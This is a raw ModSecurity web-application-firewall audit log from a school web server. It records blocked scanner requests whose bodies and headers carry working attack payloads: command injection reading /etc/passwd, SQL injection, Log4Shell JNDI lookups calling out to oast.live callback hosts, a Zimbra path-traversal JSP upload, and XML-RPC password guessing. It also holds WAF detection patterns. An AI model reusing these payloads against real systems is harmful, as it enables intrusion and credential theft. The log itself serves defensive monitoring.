X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (SS; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 160760053 --bfb2d75d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --bfb2d75d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748296204416195 3561 (- - -) Stopwatch2: 1748296204416195 3561; combined=1325, p1=493, p2=802, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bfb2d75d-Z-- --d797601f-A-- [27/May/2025:04:50:06 +0700] aDTiDhLFq2VRfSzm6b8KOAAAAJg 103.236.140.4 43906 103.236.140.4 8181 --d797601f-B-- GET /Telerik.Web.UI.WebResource.axd?_TSM_CombinedScripts_=;;System.Web.Extensions,%20Version=4.0.0.0,%20Culture=neutral,%20PublicKeyToken=31bf3856ad364e35:de-DE:db3d9eb3-6d72-4959-b303-32b61119a4a8:ea597d4b:b25378d2 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168392278 --d797601f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d797601f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748296206424101 3331 (- - -) Stopwatch2: 1748296206424101 3331; combined=1674, p1=487, p2=1157, p3=0, p4=0, p5=30, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d797601f-Z-- --56c5f658-A-- [27/May/2025:04:59:05 +0700] aDTkKWTuEZUBy5rh0sZ69wAAABc 103.236.140.4 47344 103.236.140.4 8181 --56c5f658-B-- POST /xmlrpc.php HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1516 User-Agent: Mozilla/5.0 (Linux; Android 8.0; Nexus 5X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --56c5f658-C-- system.multicall methodName wp.getUsersBlogs params admin smkn22-jkt --56c5f658-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --56c5f658-E-- --56c5f658-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1748296745848519 6367 (- - -) Stopwatch2: 1748296745848519 6367; combined=5009, p1=416, p2=4442, p3=0, p4=0, p5=89, sr=84, sw=62, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56c5f658-Z-- --41726453-A-- [27/May/2025:05:03:17 +0700] aDTlJWTuEZUBy5rh0sZ7aQAAAAc 103.236.140.4 48138 103.236.140.4 8181 --41726453-B-- POST /conf_mail.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 75 User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168411320 --41726453-C-- mail_address=%3Bcat${IFS}/etc/passwd%3B&button=%83%81%81%5B%83%8B%91%97%90M --41726453-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --41726453-E-- --41726453-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /conf_mail.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748296997417039 1933 (- - -) Stopwatch2: 1748296997417039 1933; combined=501, p1=351, p2=117, p3=0, p4=0, p5=32, sr=71, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41726453-Z-- --f0f55858-A-- [27/May/2025:05:03:17 +0700] aDTlJWTuEZUBy5rh0sZ7bQAAAAw 103.236.140.4 48158 103.236.140.4 8181 --f0f55858-B-- GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.1 Safari/605.1.15 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168411323 --f0f55858-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f0f55858-E-- --f0f55858-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 0 union select sleep(7) found within MATCHED_VAR: 0 union select sleep(7) "] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748296997420136 2474 (- - -) Stopwatch2: 1748296997420136 2474; combined=1462, p1=322, p2=1112, p3=0, p4=0, p5=28, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0f55858-Z-- --9d995a23-A-- [27/May/2025:05:03:17 +0700] aDTlJVuSH_Spa4YU2ZmqDQAAAM4 103.236.140.4 48176 103.236.140.4 8181 --9d995a23-B-- POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 39 User-Agent: Mozilla/5.0 (Knoppix; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: sid=foo X-Varnish: 164701896 --9d995a23-C-- sid=foo&hhook=exec&text=cat+/etc/passwd --9d995a23-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d995a23-E-- --9d995a23-H-- Message: Access denied with code 403 (phase 2). Matched phrase "etc/passwd" at ARGS:text. [file "/usr/local/apache/modsecurity-cwaf/rules/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: etc/passwd found within ARGS:text: cat /etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748296997435008 2531 (- - -) Stopwatch2: 1748296997435008 2531; combined=1337, p1=352, p2=945, p3=0, p4=0, p5=39, sr=74, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d995a23-Z-- --99847357-A-- [27/May/2025:05:03:17 +0700] aDTlJWTuEZUBy5rh0sZ7bgAAAA0 103.236.140.4 48158 103.236.140.4 8181 --99847357-B-- POST /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 716 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36 content-type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: X-Varnish: 169021135 --99847357-C-- PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK?Ý]…‰=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK?Ý]…‰=ð../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPKÖà --99847357-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --99847357-E-- --99847357-H-- Message: Access denied with code 403 (phase 2). Found 4 byte(s) in ARGS:PK\x03\x04\x14\x00\b\x00\b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:PK\x5cx03\x5cx04\x5cx14\x5cx00\x5cb\x5cx00\x5cb\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00=\x00\x00\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\x1c\xc8\xbd\x0a\xc20\x10\x00\xe0\xbdOQ\x02\x85\x04!(\xb8U\x5c\xfc[\xc4\x16;\xb4t;\xdbCS\xcf$\xc6K\xf4\xf1E\xd7oUd.\xb2\xf6\xc1X"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748296997434240 4487 (- - -) Stopwatch2: 1748296997434240 4487; combined=3139, p1=467, p2=2646, p3=0, p4=0, p5=26, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --99847357-Z-- --69390934-A-- [27/May/2025:05:03:17 +0700] aDTlJWTuEZUBy5rh0sZ7cAAAAA4 103.236.140.4 48168 103.236.140.4 8181 --69390934-B-- POST /service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 716 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/E7FBAF content-type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168969435 --69390934-C-- PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK?Ý]…‰=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK?Ý]…‰=ð../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPKÖà --69390934-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69390934-H-- Message: Access denied with code 403 (phase 2). Found 4 byte(s) in ARGS:PK\x03\x04\x14\x00\b\x00\b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:PK\x5cx03\x5cx04\x5cx14\x5cx00\x5cb\x5cx00\x5cb\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00=\x00\x00\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\x1c\xc8\xbd\x0a\xc20\x10\x00\xe0\xbdOQ\x02\x85\x04!(\xb8U\x5c\xfc[\xc4\x16;\xb4t;\xdbCS\xcf$\xc6K\xf4\xf1E\xd7oUd.\xb2\xf6\xc1X"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748296997434466 4440 (- - -) Stopwatch2: 1748296997434466 4440; combined=3091, p1=332, p2=2723, p3=0, p4=0, p5=35, sr=61, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69390934-Z-- --f22afe5d-A-- [27/May/2025:05:03:18 +0700] aDTlJmTuEZUBy5rh0sZ7cQAAABI 103.236.140.4 48150 103.236.140.4 8181 --f22afe5d-B-- GET /?x=${jndi:ldap://127.0.0.1 HTTP/1.1 Referer: ${jndi:ldap://127.0.0.1#.${hostName}.referer.d0q9cd1gpeook7mlf7sg78j5ewygbknmu.oast.live} Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: ${jndi:ldap://127.0.0.1#.${hostName}.useragent.d0q9cd1gpeook7mlf7sg4w4kjaiusoku4.oast.live} Accept: ${jndi:ldap://127.0.0.1#.${hostName}.accept.d0q9cd1gpeook7mlf7sghg846ryefw3o7.oast.live} Accept-Language: ${jndi:ldap://127.0.0.1#.${hostName}.acceptlanguage.d0q9cd1gpeook7mlf7sgtmuw3pi8pw38u.oast.live} Access-Control-Request-Headers: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestheaders.d0q9cd1gpeook7mlf7sgcjafcrcs7wdgf.oast.live} Access-Control-Request-Method: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestmethod.d0q9cd1gpeook7mlf7sgwac54t77g48xn.oast.live} Authentication: Bearer ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbearer.d0q9cd1gpeook7mlf7sg9z9318aber6y3.oast.live} Location: ${jndi:ldap://127.0.0.1#.${hostName}.location.d0q9cd1gpeook7mlf7sgh1jxcj86wmxwp.oast.live} Origin: ${jndi:ldap://127.0.0.1#.${hostName}.origin.d0q9cd1gpeook7mlf7sgo76zr5th9bw3z.oast.live} Upgrade-Insecure-Requests: ${jndi:ldap://127.0.0.1#.${hostName}.upgradeinsecurerequests.d0q9cd1gpeook7mlf7sg719z6ws8ic1o3.oast.live} X-Api-Version: ${jndi:ldap://127.0.0.1#.${hostName}.xapiversion.d0q9cd1gpeook7mlf7sgtn3kwrobbwfde.oast.live} X-CSRF-Token: ${jndi:ldap://127.0.0.1#.${hostName}.xcsrftoken.d0q9cd1gpeook7mlf7sg884uagf3fdyq8.oast.live} X-Druid-Comment: ${jndi:ldap://127.0.0.1#.${hostName}.xdruidcomment.d0q9cd1gpeook7mlf7sgjn8wxony1mzbn.oast.live} X-Origin: ${jndi:ldap://127.0.0.1#.${hostName}.xorigin.d0q9cd1gpeook7mlf7sgsrp5ddnz45mis.oast.live} Cookie: ${jndi:ldap://127.0.0.1#.${hostName}.cookiename.d0q9cd1gpeook7mlf7sgfkenr1eqj46e1.oast.live}=${jndi:ldap://${hostName}.cookievalue.d0q9cd1gpeook7mlf7sgdxio8uf7878me.oast.live} X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168392341 --f22afe5d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f22afe5d-E-- --f22afe5d-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at ARGS:x. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748296998120855 5777 (- - -) Stopwatch2: 1748296998120855 5777; combined=4282, p1=428, p2=3826, p3=0, p4=0, p5=28, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f22afe5d-Z-- --aec64234-A-- [27/May/2025:05:04:05 +0700] aDTlVWTuEZUBy5rh0sZ7hAAAAAA 103.236.140.4 48260 103.236.140.4 8181 --aec64234-B-- POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 585 User-Agent: Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: X-Varnish: 166620218 --aec64234-C-- ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="bne:uueupload" TRUE ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip" begin 664 test.zip M4$L#!!0``````&UP-%:3!M system.multicall methodName wp.getUsersBlogs params wakakur wakakur@1 --484bb60b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --484bb60b-E-- --484bb60b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (0+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1748297085820633 7263 (- - -) Stopwatch2: 1748297085820633 7263; combined=5452, p1=461, p2=4811, p3=0, p4=0, p5=105, sr=95, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --484bb60b-Z-- --b184bf3f-A-- [27/May/2025:05:05:39 +0700] aDTls2TuEZUBy5rh0sZ7iAAAAAM 103.236.140.4 48280 103.236.140.4 8181 --b184bf3f-B-- POST /cgi-bin/supportInstaller HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 83 User-Agent: MSIE Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 166620221 --b184bf3f-C-- fromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0-- --b184bf3f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b184bf3f-E-- --b184bf3f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0 found within MATCHED_VAR: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: cgi-script Stopwatch: 1748297139125989 2998 (- - -) Stopwatch2: 1748297139125989 2998; combined=1706, p1=416, p2=1252, p3=0, p4=0, p5=38, sr=104, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b184bf3f-Z-- --9b686532-A-- [27/May/2025:05:11:38 +0700] aDTnGt6cNBpj1JOkpQlKsAAAAFU 103.236.140.4 48392 103.236.140.4 8181 --9b686532-B-- POST /apply_sec.cgi HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id/login_pic.asp Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 95 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/118.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: uid=1234123 X-Varnish: 166620263 --9b686532-C-- html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0acat%20%2Fetc%2Fpasswd --9b686532-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9b686532-E-- --9b686532-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file 